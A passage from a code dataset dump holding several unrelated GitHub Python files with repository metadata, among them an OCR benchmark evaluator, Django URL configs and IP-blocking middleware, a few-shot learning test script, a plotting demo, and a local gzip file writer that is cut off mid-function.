gtBounds = {}\n inBounds = {}\n\n for tr_id, polygon in gtPolygons:\n gtBounds[tr_id] = box(*polygon.bounds)\n for tr_id, polygon in inPolygons:\n inBounds[tr_id] = box(*polygon.bounds)\n\n # Search for and get all of the direct matches. gtBounds_copy and inBounds_copy will house the remaining entries only.\n gtBounds_copy, inBounds_copy, matches_singles, score_singles = matchPolygonsAndRemove(\n gtBounds, inBounds)\n report['matches'] = matches_singles\n report['mean'] = score_singles\n\n # All things that are left in the input might (in combination) match with items in the ground truth, so we create unions where the\n # boundaries are within a threshold value on one border and follow one another in the Y direction (aka are underneath eachother),\n # these are 'merged' matches.\n for in_id_a, in_box_a in gtBounds_copy.items():\n for in_id_b, in_box_b in inBounds_copy.items():\n if in_id_a != in_id_b:\n (minx_a, miny_a, maxx_a, maxy_a) = in_box_a.bounds\n (minx_b, miny_b, maxx_b, maxy_b) = in_box_b.bounds\n\n # Check the vertical only\n if abs(maxy_b - miny_a) < PIXEL_MATCH_THRESHOLD and \\\n abs(minx_b - minx_a) < PIXEL_MATCH_THRESHOLD and \\\n abs(maxx_b - maxx_a) < PIXEL_MATCH_THRESHOLD:\n\n inBounds_copy[in_id_b + ','\n + in_id_a] = in_box_a.union(in_box_b)\n del inBounds_copy[in_id_a]\n del inBounds_copy[in_id_b]\n\n # The compounded boxes are now matched with the remaining boxes in the ground truth file.\n # gtBounds_rest and inBounds_rest will house the remaining entries only.\n gtBounds_rest, inBounds_rest, matches_merged, score_merged = matchPolygonsAndRemove(gtBounds_copy, inBounds_copy)\n report['matches_merged'] = matches_merged\n report['mean_merged'] = score_merged\n\n # Record the remaining entries\n report['false_negatives'] = list(gtBounds_rest.keys())\n report['false_positives'] = list(inBounds_rest.keys())\n\n for match in report['matches']:\n matches_for_text_processing[match] = report['matches'][match]['id']\n for match in report['matches_merged']:\n matches_for_text_processing[match] = report['matches_merged'][match]['id']\n\n return matches_for_text_processing, report\n\n\ndef matchPolygonsAndRemove(gtBounds, inBounds):\n matches = {}\n final_scores = []\n\n gtBounds_copy = deepcopy(gtBounds)\n inBounds_copy = deepcopy(inBounds)\n\n for gt_id, gt_box in gtBounds.items(): \n scores = [] \n for _, in_box in inBounds.items():\n score = jaccard_index_multipolygons(gt_box, in_box)\n scores.append(score)\n\n max_index = np.argmax(scores)\n\n if scores[max_index] > JACCARD_SCORE_THRESHOLD:\n match_id = list(inBounds.keys())[max_index]\n\n del inBounds_copy[match_id]\n del gtBounds_copy[gt_id]\n\n matches[gt_id] = {'id': match_id, 'score': scores[max_index]}\n final_scores.append(scores[max_index])\n\n final_score = np.average(final_scores)\n # if (len(matches) > 0):\n # final_score = np.sum(scores) / len(matches)\n\n return (gtBounds_copy, inBounds_copy, matches, final_score)\n\n\ndef processLayout(gtXML, inXML):\n gtPolygons = getPolygons(gtXML.PcGts.Page)\n inPolygons = getPolygons(inXML.PcGts.Page)\n\n gtLayout = {}\n inBounds = {}\n\n for tr_id, polygon in gtPolygons:\n gtLayout[tr_id] = polygon\n for tr_id, polygon in inPolygons:\n inBounds[tr_id] = polygon\n\n gtLayout_copy = deepcopy(gtLayout)\n\n for gt_id, gt_box in gtLayout.items():\n scores = []\n for _, in_box in inBounds.items():\n score = jaccard_index_multipolygons(gt_box, in_box)\n scores.append(score)\n\n max_index = np.argmax(scores)\n\n if scores[max_index] > JACCARD_SCORE_THRESHOLD:\n match_id = list(inBounds.keys())[max_index]\n\n del inBounds[match_id]\n del gtLayout_copy[match_id]\n print('\"{gt_id}\" matched with \"{in_id}\" with score {score}'.format(\n in_id=match_id, gt_id=gt_id, score=scores[max_index]))\n\n for in_id, in_box in inBounds.items():\n print('Input \"{in_id}\" did not match anything'.format(in_id=in_id))\n\n for (gt_id, gt_box) in gtLayout_copy.items():\n print('Ground Truth \"{gt_id}\" did not match anything'.format(\n gt_id=gt_id))\n\n\ndef getPolygons(Page):\n polygons = []\n if hasattr(Page, 'TextRegion'):\n for TextRegion in Page.TextRegion:\n pointslist = []\n for Point in TextRegion.Coords.Point:\n x = int(Point['x'])\n y = int(Point['y'])\n pointslist.append((x, y))\n\n polygon = Polygon(pointslist)\n polygons.append((TextRegion['id'], polygon))\n\n return polygons\n\n\ndef getTextregions(Page):\n textregions = []\n if hasattr(Page, 'TextRegion'):\n for TextRegion in Page.TextRegion:\n textregions.append((TextRegion['id'], TextRegion))\n\n return textregions\n\n\ndef jaccard_index_multipolygons(truth_multi, predicted_multi):\n if not (truth_multi.is_valid):\n raise ('The truth multipolygon is not valid!')\n if not (predicted_multi.is_valid):\n raise ('The predicted multipolygon is not valid!')\n\n # intersection\n intersec = truth_multi.intersection(predicted_multi).area\n # union\n union = truth_multi.union(predicted_multi).area\n\n # Jaccard index is intersection over union\n return intersec / union\n\n\nif __name__ == '__main__':\n processfile()\n","repo_name":"EYRA-Benchmark/ocr-benchmark","sub_path":"evaluation/ocrbenchmark/evaluation/evaluate_single.py","file_name":"evaluate_single.py","file_ext":"py","file_size_in_byte":12700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5809557449","text":"import json\nimport os\nimport numpy as np\nimport tables\nimport warnings\n\nfrom tierpsy.analysis.ske_filt.getFilteredSkels import _h_calAreaSignedArray\nfrom tierpsy.helper.params import read_ventral_side, single_db_ventral_side\n\n\nVALID_CNT = ['clockwise', 'anticlockwise', 'unknown']\n\ndef _add_ventral_side(skeletons_file, ventral_side=''):\n #I am giving priority to a contour stored in experiments_info, rather than one read by the json file.\n #currently i am only using the experiments_info in the re-analysis of the old schafer database\n try:\n ventral_side_f = single_db_ventral_side(skeletons_file)\n except (tables.exceptions.NoSuchNodeError, KeyError):\n ventral_side_f = ''\n\n if ventral_side_f in VALID_CNT:\n if not ventral_side or (ventral_side == ventral_side_f):\n ventral_side = ventral_side_f\n else:\n raise ValueError('The given contour orientation ({}) and the orientation stored in /experiments_info group ({}) differ. Change /experiments_info or the parameters file to solve this issue.'.format(ventral_side, ventral_side_f) )\n\n #add ventral side if given\n if ventral_side in VALID_CNT:\n with tables.File(skeletons_file, 'r+') as fid:\n fid.get_node('/trajectories_data').attrs['ventral_side'] = ventral_side\n return ventral_side\n\ndef _switch_cnt(skeletons_file):\n with tables.File(skeletons_file, 'r+') as fid:\n # since here we are changing all the contours, let's just change\n # the name of the datasets\n side1 = fid.get_node('/contour_side1')\n side2 = fid.get_node('/contour_side2')\n\n side1.rename('contour_side1_bkp')\n side2.rename('contour_side1')\n side1.rename('contour_side2')\n\ndef isBadVentralOrient(skeletons_file, ventral_side=''):\n print(ventral_side)\n ventral_side = _add_ventral_side(skeletons_file, ventral_side) \n if not ventral_side in VALID_CNT:\n return True\n\n elif ventral_side == 'unknown':\n is_bad = False\n \n elif ventral_side in ['clockwise', 'anticlockwise']:\n with tables.File(skeletons_file, 'r') as fid:\n has_skeletons = fid.get_node('/trajectories_data').col('has_skeleton')\n\n # let's use the first valid skeleton, it seems like a waste to use all the other skeletons.\n # I checked earlier to make sure the have the same orientation.\n\n valid_ind = np.where(has_skeletons)[0]\n if valid_ind.size == 0:\n #no valid skeletons, nothing to do here.\n is_bad = True\n else:\n cnt_side1 = fid.get_node('/contour_side1')[valid_ind[0], :, :]\n cnt_side2 = fid.get_node('/contour_side2')[valid_ind[0], :, :]\n A_sign = _h_calAreaSignedArray(cnt_side1, cnt_side2)\n \n # if not (np.all(A_sign > 0) or np.all(A_sign < 0)):\n # raise ValueError('There is a problem. All the contours should have the same orientation.')\n if ventral_side == 'clockwise':\n is_bad = A_sign[0] < 0\n elif ventral_side == 'anticlockwise':\n is_bad = A_sign[0] > 0\n else:\n raise ValueError\n\n if is_bad:\n _switch_cnt(skeletons_file)\n is_bad = False\n\n\n return is_bad\n\ndef ventral_orient_wrapper(func, skel_f, ventral_side, *args, **argkws):\n if isBadVentralOrient(skel_f, ventral_side):\n raise ValueError('Cannot continue the ventral side {} given is empty or incorrect'.format(ventral_side))\n return func(*args, **argkws)\n \n\n\n\ndef isGoodVentralOrient(skeletons_file, ventral_side=''):\n return not isBadVentralOrient(skeletons_file, ventral_side=ventral_side)\n\n \n","repo_name":"ver228/tierpsy-tracker","sub_path":"tierpsy/analysis/contour_orient/correctVentralDorsal.py","file_name":"correctVentralDorsal.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"78"} +{"seq_id":"40310477875","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom .views import test, question_list, question_detail, popular\n\n# urlpatterns = [\n# url(r'^$', test, name='index'),\n# url(r'^login/.*$', test, name='login'),\n# url(r'^signup/.*', test, name='signup'),\n# url(r'^question/(?P<id>[0-9]+)/$', test, name='question'),\n# url(r'^ask/.*', test, name='ask'),\n# url(r'^popular/.*', test, name='popular'), \n# url(r'^new/.*', test, name='new'), \n# ]\n\n\nurlpatterns = patterns('',\n url(r'^$', question_list, name='question_list'),\n url(r'^question/(?P<pk>\\d+)/', question_detail, name='question_detail'),\n url(r'^popular/', popular, name='popular'),\n url(r'^login/', test, name='login'),\n url(r'^signup/', test, name='signup'),\n url(r'^ask/', test, name='ask'),\n url(r'^new/', test, name='new'),\n url(r'^admin/', admin.site.urls),\n)","repo_name":"seblex/stepic","sub_path":"ask/qa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19723619982","text":"from typing import List\n\nimport datetime\nimport pandas as pd\n\n\nclass DateListConverter:\n @staticmethod\n def convert(dates: List[datetime.datetime], days=10) -> pd.DataFrame:\n df = pd.DataFrame(columns=[\"solved\"])\n for date in dates:\n x = pd.DataFrame({\"solved\": [1]}, index=[date])\n df = df.append(x)\n\n for i in range(days):\n date = datetime.datetime.now() - datetime.timedelta(days=i)\n x = pd.DataFrame({\"solved\": [0]}, index=[date])\n df = df.append(x)\n\n df = df.groupby(pd.Grouper(level=0, freq=\"d\")).sum()\n return df.sort_index(ascending=False)[:days].sort_index(ascending=True)\n","repo_name":"kenkoooo/todoist-achievements","sub_path":"todoist_achievements/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40033348632","text":"import logging\nfrom logging.config import dictConfig\nfrom tqdm import tqdm\n\nlogging_config = dict(\n version=1,\n formatters={\n 'f': {'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'},\n 'f1': {'format': '%(asctime)s %(levelname)-8s %(message)s'}\n },\n handlers={\n 'sh': {'class': 'logging.StreamHandler',\n 'formatter': 'f',\n 'level': logging.DEBUG\n },\n 'fh': {'class': 'logging.FileHandler',\n 'filename': 'word2vec.log',\n 'formatter': 'f1',\n 'level': logging.DEBUG\n }\n },\n root={\n 'handlers': ['sh', 'fh'],\n 'level': logging.DEBUG,\n },\n)\ndictConfig(logging_config)\nlogger = logging.getLogger()\n\n\nclass TaskReporter(object):\n def __init__(self, task):\n self.task = task\n\n def __call__(self, original_func):\n decorator_self = self\n\n def wrapper(*args, **kwargs):\n logger.info(\"Processing task: {}...\".format(decorator_self.task))\n res = original_func(*args, **kwargs)\n logger.info(\"Task: {} is done\".format(decorator_self.task))\n return res\n return wrapper\n\n\nclass DLProgress(tqdm):\n last_block = 0\n\n def hook(self, block_num=1, block_size=1, total_size=None):\n \"\"\"\n :param block_num: int, optional\n Number of blocks transferred so far [default: 1].\n :param block_size: int, optional\n Size of each block (in tqdm units) [default: 1].\n :param total_size: int, optional\n Total size (in tqdm units). If [default: None] remains unchanged.\n \"\"\"\n self.total = total_size\n self.update((block_num - self.last_block) * block_size)\n self.last_block = block_num\n\n","repo_name":"chutianwen/TensorflowProjects","sub_path":"Embedding_Word2Vec/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9680472702","text":"import torch\nimport json\nimport os\nimport glob\nimport random\nimport time\nimport argparse\nimport yaml\nimport numpy as np\nfrom easydict import EasyDict\nimport sys\nimport os.path as osp\nif not os.getcwd() in sys.path:\n sys.path.append(os.getcwd())\nfrom fewshot.data import feature_loader\nfrom fewshot.utils import model_util, data_util,com_util\n\ndef main(params):\n acc_all = []\n\n print('dataset: {}, method: {}, model: {}'.format(params.dataset, params.method, params.model))\n\n # load model\n model = model_util.get_model(params, False)\n\n save_dir = com_util.get_save_dir(params)\n if params.save_iter != -1:\n modelfile = com_util.get_assigned_file(save_dir, params.save_iter)\n else:\n modelfile = com_util.get_best_file(save_dir)\n if modelfile is not None:\n tmp = torch.load(modelfile)\n # import pdb; pdb.set_trace()\n model.load_state_dict(tmp['state_dict'], strict=False)\n\n split = params.split\n iter_num = params.iter_num\n if params.save_iter != -1:\n split_str = split + \"_\" + str(params.save_iter)\n else:\n split_str = split\n\n # test\n if params.method in ['maml', 'maml_approx', 'protonet', 'protonet_joint']:\n novel_loader = data_util.get(params, False)\n model.eval()\n acc_mean, acc_std = model.test_loop(novel_loader, return_std=True)\n else:\n few_shot_params = dict(n_way=params.test_n_way, n_support=params.n_shot)\n novel_file = os.path.join(save_dir.replace(\"ckpts\", \"feats\"), split_str + \".hdf5\")\n cl_data_file = feature_loader.init_loader(novel_file)\n ## 5 way 5 shot default\n for i in range(iter_num):\n acc = feat_eval(cl_data_file, model, n_query=15, adaptation=params.adaptation, **few_shot_params)\n acc_all.append(acc)\n acc_all = np.asarray(acc_all)\n acc_mean = np.mean(acc_all)\n acc_std = np.std(acc_all)\n print('%d Test Acc = %4.2f%% +- %4.2f%%' % (iter_num, acc_mean, 1.96*acc_std/np.sqrt(iter_num)))\n\n # record\n with open(osp.join(save_dir, 'record.txt'), 'a') as f:\n timestamp = time.strftime(\"%Y%m%d-%H%M%S\", time.localtime())\n aug_str = '-aug' if params.train_aug else ''\n aug_str += '-adapted' if params.adaptation else ''\n if params.method in ['baseline', 'baseline++'] :\n exp_setting = '%s-%s-%s-%s%s %sshot %sway_test' %(params.dataset, split_str, params.model, params.method, aug_str, params.n_shot, params.test_n_way )\n else:\n exp_setting = '%s-%s-%s-%s%s %sshot %sway_train %sway_test' % (params.dataset, split_str, params.model, params.method, aug_str, params.n_shot, params.train_n_way, params.test_n_way)\n acc_str = '%d Test Acc = %4.2f%% +- %4.2f%%' % (iter_num, acc_mean, 1.96* acc_std/np.sqrt(iter_num))\n f.write( 'Time: %s, Setting: %s, Acc: %s \\n' % (timestamp,exp_setting,acc_str))\n\n\ndef feat_eval(cl_data_file, model, n_way = 5, n_support = 5, n_query = 15, adaptation = False):\n class_list = cl_data_file.keys()\n\n select_class = random.sample(class_list, n_way)\n z_all = []\n for cl in select_class:\n img_feat = cl_data_file[cl]\n perm_ids = np.random.permutation(len(img_feat)).tolist()\n z_all.append([np.squeeze( img_feat[perm_ids[i]]) for i in range(n_support+n_query)])\n z_all = torch.from_numpy(np.array(z_all))\n\n model.n_query = n_query\n if adaptation:\n scores = model.set_forward_adaptation(z_all, is_feature = True)\n else:\n scores = model.set_forward(z_all, is_feature = True)\n pred = scores.data.cpu().numpy().argmax(axis = 1)\n y = np.repeat(range( n_way ), n_query)\n acc = np.mean(pred == y) * 100\n return acc\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='PyTorch Testing')\n parser.add_argument('--config', default='cfgs/baseline/miniImagenet.yaml')\n args = parser.parse_args()\n\n with open(args.config) as f:\n config = yaml.load(f)\n params = EasyDict(config['common'])\n params.update(config['test'])\n\n main(params)\n","repo_name":"LargeFishPKU/Joint-KG-Vision-Project","sub_path":"fsl-pytorch-master/tools/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38900982441","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : 1640.py\n# @Time : 2020/11/23 23:38\n# @Author : Rivarrl\n# ======================================\nfrom algorithm_utils import *\n\nclass Solution:\n \"\"\"\n [1640. 能否连接形成数组](https://leetcode-cn.com/problems/check-array-formation-through-concatenation/)\n \"\"\"\n @timeit\n def canFormArray(self, arr: List[int], pieces: List[List[int]]) -> bool:\n n = len(pieces)\n m = len(arr)\n ids = [0] * n\n i = 0\n while i < m:\n last = i\n j = 0\n while j < n:\n while ids[j] < len(pieces[j]) and pieces[j][ids[j]] == arr[i]:\n ids[j] += 1\n i += 1\n if i != last: break\n j += 1\n if last == i or ids[j] != len(pieces[j]): return False\n return all(ids[i] == len(pieces[i]) for i in range(n))\n\n\n\nif __name__ == '__main__':\n a = Solution()\n a.canFormArray(arr = [85], pieces = [[85]])\n a.canFormArray(arr = [15,88], pieces = [[88],[15]])\n a.canFormArray(arr = [49,18,16], pieces = [[16,18,49]])\n a.canFormArray(arr = [91,4,64,78], pieces = [[78],[4,64],[91]])\n a.canFormArray(arr = [1,3,5,7], pieces = [[2,4,6,8]])\n a.canFormArray([1,2,3], [[2],[1,3]])","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/1501-1800/1640.py","file_name":"1640.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"28613607297","text":"#!/usr/bin/env pypy\n\nimport sys\n\nif len(sys.argv) < 2:\n print(\"Usage: %s [N]\" % (sys.argv[0], ))\n exit(-1)\n\nN = int(sys.argv[1])\n\nseq = [x for x in range(1, N + 1)]\nfor i in range(1, len(seq) / 2, 2):\n seq[i], seq[len(seq) - i - 1] = seq[len(seq) - i - 1], seq[i]\n\nfor x in seq:\n print(\"%s\" % (x, ))\n","repo_name":"riteme/test","sub_path":"oi/Contest/self/2016-6/riteme/divide-gen.py","file_name":"divide-gen.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"39379237540","text":"\"\"\"online_shop_be URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom products.views import *\nfrom orders.views import * \n\n# from rest_framework import routers\n\n# router = routers.DefaultRouter()\n# router.register(r'products', viewProducts.ProductView, 'product')\n# router.register(r'orders', viewOrders.OrderView, 'order')\n\n# urlpatterns = [\n# path('admin/', admin.site.urls),\n# path('api/', include(router.urls))\n# ]\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n path(\"api/orders/\", \n OrderListCreateAPIView.as_view(), \n name=\"order-list\"),\n\n path(\"api/orders/<int:pk>/\", \n OrderDetailAPIView.as_view(), \n name=\"order-detail\"),\n\n path(\"api/products/\", \n ProductListCreateAPIView.as_view(), \n name=\"product-list\"),\n \n path(\"api/products/<int:pk>\", \n ProductDetailAPIView.as_view(), \n name=\"product-detail\")\n]","repo_name":"Serenity911/online_shop_be","sub_path":"online_shop_be/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"36818387193","text":"import datetime\r\nfrom .models import BlockedIP, WhitelistedIP\r\nfrom django.conf import settings\r\nfrom django.http import HttpResponseForbidden\r\n\r\n\r\nclass IPBlockerMiddleWare:\r\n def __init__(self, get_response):\r\n self.whitelisted_ips = [x['ip'] for x in WhitelistedIP.objects.values('ip')]\r\n self.blocked_ips = [x['ip'] for x in BlockedIP.objects.values('ip')]\r\n self.get_response = get_response\r\n self.last_check = 0\r\n self.response = None\r\n\r\n def __call__(self, request):\r\n self.date = datetime.datetime.now().strftime('%Y%j%H%M')\r\n self.request = request\r\n self.ip = self.get_client_ip()\r\n self.response = self.get_response(self.request)\r\n\r\n try:\r\n self.whitelist = settings.WHITELIST\r\n\r\n except AttributeError:\r\n self.whitelist = False\r\n\r\n try:\r\n self.block_time = settings.BLOCK_TIME\r\n\r\n except AttributeError:\r\n self.block_time = 10\r\n\r\n if not isinstance(self.block_time, int) and self.block_time is not None:\r\n raise ValueError('\\'BLOCK_TIME\\' must be an integer or a NoneType')\r\n\r\n if not isinstance(self.whitelist, bool):\r\n raise ValueError('\\'WHITELIST\\' must be a boolean')\r\n\r\n return self.check()\r\n\r\n def check(self):\r\n if self.block_time:\r\n if int(self.date) - int(self.last_check) >= self.block_time:\r\n self.refresh()\r\n else:\r\n self.refresh()\r\n\r\n if self.whitelist:\r\n if self.ip not in self.whitelisted_ips:\r\n self.response = HttpResponseForbidden()\r\n else:\r\n if self.ip in self.blocked_ips:\r\n self.response = HttpResponseForbidden()\r\n\r\n return self.response\r\n\r\n def refresh(self):\r\n self.whitelisted_ips = [x['ip'] for x in WhitelistedIP.objects.values('ip')]\r\n self.blocked_ips = [x['ip'] for x in BlockedIP.objects.values('ip')]\r\n self.last_check = datetime.datetime.now().strftime('%Y%j%H%M')\r\n\r\n def get_client_ip(self):\r\n x_forwarded_for = self.request.META.get('HTTP_X_FORWARDED_FOR')\r\n if x_forwarded_for:\r\n ip = x_forwarded_for.split(',')[0]\r\n else:\r\n ip = self.request.META.get('REMOTE_ADDR')\r\n\r\n return ip\r\n","repo_name":"RootOperator/django-ip-block-whitelist","sub_path":"ip_block_whitelist/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12758265863","text":"a = input()\nb = input()\nresult = \"\"\nfor i in range(len(a)):\n result += a[i]\n if i == len(b) - 1 and len(a) > len(b):\n result += b[i]\n break\n for j in range(len(b)):\n if j == len(b) and len(b) > len(a):\n result += b[j, :]\n if i == j:\n result += b[j]\n\n\nprint(result)\n","repo_name":"elyasha/simple-tic-tac-toe","sub_path":"Topics/Iterators/Word constructor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22371335875","text":"import cv2\nimport numpy as np\no = cv2.imread(\"edges_close.bmp\")\nsrc = cv2.imread(\"Image0001.bmp\")\nheight,width = src.shape[0:2]\nsrc = cv2.resize(src,(int(width/2),int(height/2)))\ngray = cv2.cvtColor(o,cv2.COLOR_BGR2GRAY)\nret, binary = cv2.threshold(gray,127,255,cv2.THRESH_BINARY)\ncontours, hierarchy = cv2.findContours(binary,\n cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)\nfor i in range(len(contours)):\n hull = cv2.convexHull(contours[i])\n cv2.polylines(src, [hull], True, (0, 255, 0), 2)\ncv2.imshow(\"result\",src)\ncv2.imwrite(\"result.bmp\",src)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n\n","repo_name":"Seanhom/MyNote","sub_path":"opencv/划痕检测/缺陷包围框.py","file_name":"缺陷包围框.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9250785614","text":"from itertools import combinations\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.gridspec import GridSpec\nfrom matplotlib.patches import Rectangle\n\nimport seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\n\nfrom metroplot import metroplot\n\n# Metroplot usage example\n\n# Read Eysenck (1974) table from David Howell's website\ndata = pd.read_csv(\n \"https://www.uvm.edu/~statdhtx/methods8/DataFiles/Tab13-2.dat\", delimiter=\"\\t\"\n)\ndata[\"Condition\"] = [\n {1: \"Counting\", 2: \"Rhyming\", 3: \"Adjective\", 4: \"Imagery\", 5: \"Intention\"}[c]\n for c in data[\"Condition\"]\n]\ndata[\"Age\"] = [{1: \"Old\", 2: \"Young\"}[c] for c in data[\"Age\"]]\n\n\ndef pairwise_ttest(data, factor, dependent):\n \"\"\"run t-tests between all levels of a factor and\"\"\"\n levels = data[factor].unique()\n\n # test all pairwise comparisons\n pairwise_comparisons = []\n for level1, level2 in combinations(levels, r=2):\n a = data.loc[data[factor] == level1, dependent]\n b = data.loc[data[factor] == level2, dependent]\n\n t, p_value, df = sm.stats.ttest_ind(a, b)\n\n pairwise_comparisons.append(\n {\n \"level1\": level1,\n \"level2\": level2,\n \"effect_direction\": np.sign(t),\n \"p_value\": p_value,\n }\n )\n pairwise_comparisons = pd.DataFrame(pairwise_comparisons)\n\n # multiple comparison correction\n (\n is_sig,\n corrected,\n _,\n _,\n ) = sm.stats.multipletests(pairwise_comparisons[\"p_value\"], method=\"fdr_bh\")\n\n pairwise_comparisons[\"is_sig\"] = is_sig\n pairwise_comparisons[\"corrected_p_value\"] = corrected # this is not currently used\n\n return pairwise_comparisons\n\n\npairwise_comparisons = pairwise_ttest(data, \"Condition\", \"Recall\")\n\nconditions = data[\"Condition\"].unique()\n\nprint(\"pairwise comparisons results:\")\nprint(pairwise_comparisons)\n\nfig = plt.figure(figsize=(5, 4))\ngs = GridSpec(\n 2, 1, height_ratios=[0.75, 5], hspace=0.05, figure=fig\n) # we create two subplots, one for the main plot and one for the metroplot.\nax0 = fig.add_subplot(gs[1])\nsns.barplot(data=data, x=\"Condition\", y=\"Recall\", order=conditions)\nsns.despine(fig)\ngs.tight_layout(fig)\n\n# # grab colors from Seaborn's barplot.\nbars = [r for r in ax0.get_children() if type(r) == Rectangle]\ncolors = [c.get_facecolor() for c in bars[:-1]]\nlevel_palette = {cond: color for cond, color in zip(conditions, colors)}\n\nlevel_to_location = {\n cond: i for i, cond in enumerate(conditions)\n} # map categories to x axis locations.\nax1 = fig.add_subplot(gs[0])\nmetroplot(\n pairwise_comparisons,\n level_to_location=level_to_location,\n metroplot_element_order=conditions,\n ax=ax1,\n level_axis=\"x\",\n dominating_effect_direction=1,\n level_pallete=level_palette,\n level_axis_lim=ax0.get_xlim(),\n)\n# # note that level_axis_lim=ax0.get_xlim() aligns the metrplot with the main plot\n\n# %%\n# a slightly more complicated example\n\nfig = plt.figure(figsize=(6, 6))\ngs = GridSpec(1, 2, width_ratios=[4, 2.5], wspace=0.01, figure=fig)\nax0 = fig.add_subplot(gs[0])\n\ndata[\"Group\"] = [cond + \" \" + age for age, cond in zip(data[\"Age\"], data[\"Condition\"])]\nlevel_palette = {\n \"Counting\": \"#a6cee3\",\n \"Rhyming\": \"#1f78b4\",\n \"Adjective\": \"#b2df8a\",\n \"Imagery\": \"#33a02c\",\n \"Intention\": \"#fb9a99\",\n}\n\npairwise_comparisons = pairwise_ttest(data, \"Group\", \"Recall\")\n\nprint(\"pairwise comparisons results:\")\nprint(pairwise_comparisons)\n\nconditions = data[\"Group\"].unique()\nconditions.sort()\n\nsns.boxplot(\n data=data, y=\"Group\", x=\"Recall\", ax=ax0, color=\"w\", order=conditions\n) # , hue='Condition', palette=level_palette)\ngs.tight_layout(fig)\n\nlevel_to_location = {\n cond: i for i, cond in enumerate(conditions)\n} # map categories to y axis locations.\n\nax1 = fig.add_subplot(gs[1])\nmetroplot(\n pairwise_comparisons,\n level_to_location=level_to_location,\n metroplot_element_order=conditions,\n ax=ax1,\n level_axis=\"y\",\n dominating_effect_direction=1,\n level_pallete=\"k\",\n level_axis_lim=ax0.get_ylim(),\n)\n# # note that level_axis_lim=ax0.get_ylim() aligns the metrplot with the main plot\n\nplt.show()\n","repo_name":"Tal-Golan/metroplot","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"17594275228","text":"import dataclasses\nimport gzip\nimport logging\nimport pathlib\nimport re\nfrom typing import Callable, Generator, Iterable, Iterator, List, Optional\n\n_logger = logging.getLogger()\n\n\n_FILE_PART_RE = re.compile(r\"tweets-(\\d+)\\.jsonl\\.gz\")\n\n\nclass _FileMaxSizeReached(Exception):\n pass\n\n\ndef get_index_from_filename(filename: str) -> Optional[int]:\n \"\"\"Extracts file index from filename\n\n Examples:\n Filename: `tweets-2.jsonl.gz` -> `2`\n\n Filename: `tweets-a.jsonl.gz` -> `None`\n \"\"\"\n match = _FILE_PART_RE.fullmatch(filename)\n if match is None:\n # No match\n return None\n return int(match.group(1))\n\n\ndef get_latest_file_index(filenames: List[str]) -> int:\n \"\"\"The number suffix of the file to write the next documents\n\n Returns:\n int: Index of next file\n \"\"\"\n file_indices = list(filter(None, (get_index_from_filename(f) for f in filenames)))\n if len(file_indices) == 0:\n # When no files we start at 0\n return 0\n if len(file_indices) == 1:\n # Only one file\n return file_indices[0]\n # Otherwise multiple files\n return max(file_indices)\n\n\n@dataclasses.dataclass\nclass LocalFileDriver:\n \"\"\"Drivers that writes text in local files\n\n Attributes:\n path (str): The path to a local folder\n max_file_size (int): The maximum file size before writing to a new file.\n Default to 1G.\n \"\"\"\n\n path: pathlib.Path\n max_file_size: int = 2**30\n\n def __post_init__(self):\n # Must be a valid folder\n try:\n self.path.mkdir(parents=True, exist_ok=True)\n except FileExistsError:\n # The path exists and is a not a folder\n raise ValueError(\"The path should be a folder.\")\n\n def _iterate_line_until_file_max_size(\n self, file_size_fun: Callable[[], int], lines: Iterator[bytes]\n ) -> Generator[bytes, None, None]:\n while True:\n # If the file is already too big, 